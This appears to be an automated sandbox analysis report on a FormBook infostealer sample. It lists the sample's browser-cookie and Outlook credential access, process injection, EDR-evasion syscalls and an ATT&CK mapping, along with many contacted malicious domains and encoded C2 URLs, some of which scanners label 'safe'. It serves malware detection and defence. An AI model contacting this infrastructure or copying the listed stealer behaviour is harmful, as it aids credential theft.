          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading          		312
          Process Injection          		2
          Virtualization/Sandbox Evasion          		1
          OS Credential Dumping          		121
          Security Software Discovery          		Remote Services1
          Email Collection          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Abuse Elevation Control Mechanism          		312
          Process Injection          		LSASS Memory2
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Archive Collected Data          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin Shares1
          Data from Local System          		4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Abuse Elevation Control Mechanism          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture4
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
          Obfuscated Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Software Packing          		Cached Domain Credentials12
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554612 Sample: wavjjT3sEq.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 24 www.vasehub.xyz 2->24 26 www.moritynomxd.xyz 2->26 28 22 other IPs or domains 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus detection for URL or domain 2->40 44 5 other signatures 2->44 9 wavjjT3sEq.exe 2->9         started        signatures3 42 Performs DNS queries to domains with low reputation 26->42 process4 signatures5 48 Maps a DLL or memory area into another process 9->48 12 tIEQBQsFNUYr.exe 9->12 injected process6 signatures7 50 Found direct / indirect Syscall (likely to bypass EDR) 12->50 15 mshta.exe 13 12->15         started        process8 signatures9 52 Tries to steal Mail credentials (via file / registry access) 15->52 54 Tries to harvest and steal browser information (history, passwords, etc) 15->54 56 Modifies the context of a thread in another process (thread injection) 15->56 58 3 other signatures 15->58 18 tIEQBQsFNUYr.exe 15->18 injected 22 firefox.exe 15->22         started        process10 dnsIp11 30 www.coffee-and-blends.info 217.160.0.231, 49850, 49860, 49872 ONEANDONE-ASBrauerstrasse48DE Germany 18->30 32 www.vasehub.xyz 162.213.249.216, 49806, 49815, 49822 NAMECHEAP-NETUS United States 18->32 34 8 other IPs or domains 18->34 46 Found direct / indirect Syscall (likely to bypass EDR) 18->46 signatures12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          wavjjT3sEq.exe71%ReversingLabsWin32.Backdoor.FormBook
          wavjjT3sEq.exe100%AviraTR/Crypt.ZPACK.Gen
          wavjjT3sEq.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.nad5.shop/moqb/?TTd=yRNPZBU8fZA&mnYxMt=5S0MhnNpk6MkkLalRnUZdzXeRbBtBDflj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsQmQr2N8nNBPzMWj0VDcmFp5Ede8h+DqCqOrnQWhCDltJQ==0%Avira URL Cloudsafe
          http://www.nad5.shop/moqb/0%Avira URL Cloudsafe
          http://www.tmstore.click/qmcg/0%Avira URL Cloudsafe
          http://www.softillery.info/xia9/0%Avira URL Cloudsafe
          http://www.tmstore.click/qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzKmUGNgGAEHlgTmn1kSmBKemMzzmn4XCXnVEaEKQ/eq21A==&TTd=yRNPZBU8fZA0%Avira URL Cloudsafe
          http://www.40wxd.top/xqel/?TTd=yRNPZBU8fZA&mnYxMt=vvqDHEJ83RQMdUhg1EKNs//bEg71XT6q1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Ki9HalpMd1Ir/+EzHBu1DH6h7lGA7WG3xqwFFB+pHyvvKg==100%Avira URL Cloudmalware
          http://www.amitayush.digital/5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HK3o+HppIUB4jPHNr8oJc0/dyFD8r5IhzQkmiC+XTwnzrQ==&TTd=yRNPZBU8fZA0%Avira URL Cloudsafe
          http://www.amitayush.digital/5ab9/0%Avira URL Cloudsafe
          http://www.vasehub.xyz/rhgo/0%Avira URL Cloudsafe
          http://www.tukaari.shop0%Avira URL Cloudsafe
          https://helpdesk.atom.com/en/articles/389625-trademark-research-service70%Avira URL Cloudsafe
          http://www.digitalbloom.info/frw6/0%Avira URL Cloudsafe
          http://www.luxe.guru/esft/0%Avira URL Cloudsafe
          http://www.digitalbloom.info/frw6/?mnYxMt=UG3twl1RTWICP6a/gHNO8KHNMAUFMYd04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRyja311ZOzbuI/6XNArj8rsZzk05Ib+oXtNARvJ557jq8EQ==&TTd=yRNPZBU8fZA0%Avira URL Cloudsafe
          http://www.specialgift.asia/s7e8/?TTd=yRNPZBU8fZA&mnYxMt=Qf5nKOHOS6pOo2hrLtSm+ampCv+PHNIpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneDowc/gh6rYJzY7Er9+/8bJZT8eqOHKV6gTsddlCzKVbHQ==0%Avira URL Cloudsafe
          http://www.moritynomxd.xyz/d5je/?mnYxMt=joFU07nwohD6eVof7LEAc8A6AvX4Xdan1fIADxIG1iVHGQ+b2sFWG9fhj6bDMdYTFTYIwFceucpsU6xb3PR2iBltimhMIjfcvDspXx4VIdueoAIlFt6Qc63ge1Cxn5PIrg==&TTd=yRNPZBU8fZA0%Avira URL Cloudsafe
          http://www.tukaari.shop/h8b0/?mnYxMt=DRMewQ2K/nAxApdBv9ra6bsCdKq6L6XhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpgUg2JSERF0UkR4bqmVQDFHy6vjAN9/CTn0QkHjb1AS2LQ==&TTd=yRNPZBU8fZA0%Avira URL Cloudsafe
          http://www.multileveltravel.world/ou1g/?mnYxMt=p6P+FgoGiP/G4Ng3oYlXbImlMlvFFtomc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4jq6HSjjn+IbLc0VRvScSlPe00C22kG27m5w2cAUdRcq5A==&TTd=yRNPZBU8fZA0%Avira URL Cloudsafe
          https://helpdesk.atom.com/squadhelp-services/trademark-filing-package0%Avira URL Cloudsafe
          https://www.tmstore.click/qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FP0%Avira URL Cloudsafe
          http://www.moritynomxd.xyz/d5je/0%Avira URL Cloudsafe
          https://www.amitayush.digital/5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2Amz0%Avira URL Cloudsafe
          http://www.tukaari.shop/h8b0/0%Avira URL Cloudsafe
          http://www.multileveltravel.world/ou1g/0%Avira URL Cloudsafe
          http://www.filelabel.info/lclg/?mnYxMt=qGNQqN428OgBR9iLlEb4WGf8+MyTqJq+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkFANGX4pZoX9Su7sNqFMId0FgDeuDTQ2y3FSwAk0Ntj9dQ==&TTd=yRNPZBU8fZA0%Avira URL Cloudsafe
          http://www.coffee-and-blends.info/jp2s/0%Avira URL Cloudsafe
          http://www.softillery.info/xia9/?TTd=yRNPZBU8fZA&mnYxMt=6Fbp2c2euLl3IpV0Sl4p6qZBCOQHPcn3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JTmoB07JhO43d4HdqVa/yMKia/c5OjSLq43HtsiZpZ7nyQ==0%Avira URL Cloudsafe
          http://www.coffee-and-blends.info/jp2s/?TTd=yRNPZBU8fZA&mnYxMt=P0qG7QiazDWD2BWfpofH/Z3c5n3R/ut+aX9fXKMK+x60PE0IVfUJFQ907pREBNW8LmwaLsR1/kIgdQ4HVuT4weE+MfzEO7kysrfh1XHRqn8s8FFNRzB3KWFDa4Bz8OGfyA==0%Avira URL Cloudsafe
          http://www.filelabel.info/lclg/0%Avira URL Cloudsafe
          http://www.vasehub.xyz/rhgo/?mnYxMt=1xwwfRv/EtrSMau9mvfnqZyv+rHmSC/oq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tCPQXm9YsirdLDRzA3cfwD9qJJnnuO9mn3dTqKhTCwV4Aw==&TTd=yRNPZBU8fZA0%Avira URL Cloudsafe
          http://www.40wxd.top/xqel/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.vasehub.xyz
          		162.213.249.216
          		truetrue
            		unknown
            softillery.info
            		3.33.130.190
            		truetrue
              		unknown
              tukaari.shop
              		3.33.130.190
              		truetrue
                		unknown
                www.moritynomxd.xyz
                		172.81.61.224
                		truetrue
                  		unknown
                  40wxd.top
                  		206.119.82.134
                  		truetrue
                    		unknown
                    www.specialgift.asia.s.strikinglydns.com
                    		35.156.117.131
                    		truetrue
                      		unknown
                      www.luxe.guru
                      		52.20.84.62
                      		truetrue
                        		unknown
                        dns.ladipage.com
                        		54.179.173.60
                        		truefalse
                          		high
                          www.coffee-and-blends.info
                          		217.160.0.231
                          		truetrue
                            		unknown
                            filelabel.info
                            		3.33.130.190
                            		truetrue
                              		unknown
                              www.nad5.shop
                              		156.226.22.233
                              		truetrue
                                		unknown
                                ghs.googlehosted.com
                                		142.250.185.179
                                		truefalse
                                  		high
                                  multileveltravel.world
                                  		3.33.130.190
                                  		truetrue
                                    		unknown
                                    www.tukaari.shop
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.tmstore.click
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.40wxd.top
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.gemtastic.shop
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.softillery.info
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.longfilsalphonse.net
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.multileveltravel.world
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.digitalbloom.info
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.filelabel.info
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.specialgift.asia
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.amitayush.digital
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.nad5.shop/moqb/?TTd=yRNPZBU8fZA&mnYxMt=5S0MhnNpk6MkkLalRnUZdzXeRbBtBDflj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsQmQr2N8nNBPzMWj0VDcmFp5Ede8h+DqCqOrnQWhCDltJQ==true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nad5.shop/moqb/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.amitayush.digital/5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HK3o+HppIUB4jPHNr8oJc0/dyFD8r5IhzQkmiC+XTwnzrQ==&TTd=yRNPZBU8fZAfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.softillery.info/xia9/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.40wxd.top/xqel/?TTd=yRNPZBU8fZA&mnYxMt=vvqDHEJ83RQMdUhg1EKNs//bEg71XT6q1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Ki9HalpMd1Ir/+EzHBu1DH6h7lGA7WG3xqwFFB+pHyvvKg==true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.tmstore.click/qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzKmUGNgGAEHlgTmn1kSmBKemMzzmn4XCXnVEaEKQ/eq21A==&TTd=yRNPZBU8fZAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.tmstore.click/qmcg/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.amitayush.digital/5ab9/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.vasehub.xyz/rhgo/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.specialgift.asia/s7e8/?TTd=yRNPZBU8fZA&mnYxMt=Qf5nKOHOS6pOo2hrLtSm+ampCv+PHNIpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneDowc/gh6rYJzY7Er9+/8bJZT8eqOHKV6gTsddlCzKVbHQ==true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.digitalbloom.info/frw6/?mnYxMt=UG3twl1RTWICP6a/gHNO8KHNMAUFMYd04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRyja311ZOzbuI/6XNArj8rsZzk05Ib+oXtNARvJ557jq8EQ==&TTd=yRNPZBU8fZAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.digitalbloom.info/frw6/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.luxe.guru/esft/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.moritynomxd.xyz/d5je/?mnYxMt=joFU07nwohD6eVof7LEAc8A6AvX4Xdan1fIADxIG1iVHGQ+b2sFWG9fhj6bDMdYTFTYIwFceucpsU6xb3PR2iBltimhMIjfcvDspXx4VIdueoAIlFt6Qc63ge1Cxn5PIrg==&TTd=yRNPZBU8fZAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.multileveltravel.world/ou1g/?mnYxMt=p6P+FgoGiP/G4Ng3oYlXbImlMlvFFtomc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4jq6HSjjn+IbLc0VRvScSlPe00C22kG27m5w2cAUdRcq5A==&TTd=yRNPZBU8fZAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.tukaari.shop/h8b0/?mnYxMt=DRMewQ2K/nAxApdBv9ra6bsCdKq6L6XhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpgUg2JSERF0UkR4bqmVQDFHy6vjAN9/CTn0QkHjb1AS2LQ==&TTd=yRNPZBU8fZAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.moritynomxd.xyz/d5je/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.tukaari.shop/h8b0/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.multileveltravel.world/ou1g/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.filelabel.info/lclg/?mnYxMt=qGNQqN428OgBR9iLlEb4WGf8+MyTqJq+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkFANGX4pZoX9Su7sNqFMId0FgDeuDTQ2y3FSwAk0Ntj9dQ==&TTd=yRNPZBU8fZAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.softillery.info/xia9/?TTd=yRNPZBU8fZA&mnYxMt=6Fbp2c2euLl3IpV0Sl4p6qZBCOQHPcn3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JTmoB07JhO43d4HdqVa/yMKia/c5OjSLq43HtsiZpZ7nyQ==true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.vasehub.xyz/rhgo/?mnYxMt=1xwwfRv/EtrSMau9mvfnqZyv+rHmSC/oq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tCPQXm9YsirdLDRzA3cfwD9qJJnnuO9mn3dTqKhTCwV4Aw==&TTd=yRNPZBU8fZAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.filelabel.info/lclg/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.coffee-and-blends.info/jp2s/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.coffee-and-blends.info/jp2s/?TTd=yRNPZBU8fZA&mnYxMt=P0qG7QiazDWD2BWfpofH/Z3c5n3R/ut+aX9fXKMK+x60PE0IVfUJFQ907pREBNW8LmwaLsR1/kIgdQ4HVuT4weE+MfzEO7kysrfh1XHRqn8s8FFNRzB3KWFDa4Bz8OGfyA==true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.40wxd.top/xqel/true
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabmshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.atom.com/premium-domains-for-sale/all/length/Shortmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.atom.com/premium-domains-for-sale/all/length/4%20Lettersmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.atom.com/blog/discover-atom/tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.atom.com/taglinesmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.atom.com/public/images/logo.svgmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.atom.com/domain-appraisalmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.atom.com/radar/mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.atom.com/blog/mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.atom.com/auctionsmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.atom.com/ultra-premium-marketplace/allmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.atom.com/tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.atom.com/business-name-generatormshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.atom.com/public/images/build_brand/icon-arrow-long-right.svg);mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.atom.com/connectmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.atom.com/join-as-creativemshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.atom.com/premium-domains-for-sale/all/length/3%20Lettersmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.tukaari.shoptIEQBQsFNUYr.exe, 00000005.00000002.3917330030.00000000052F0000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.atom.com/branding-marketing-naming-contestsmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.atom.com/premium-domains-for-sale/all/type_of_name/One%20Wordmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.atom.com/premium-domains-for-saletIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.atom.com/brand-identity-designmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://helpdesk.atom.com/en/articles/389625-trademark-research-service7mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://www.atom.com/premium-domains-for-sale/allmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.atom.com/free-trademark-searchmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.atom.com/pricingmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.atom.com/domain-name-generatormshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.atom.com/logosmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirectfirefox.exe, 00000007.00000002.1912289226.0000000005864000.00000004.80000000.00040000.00000000.sdmpfalse
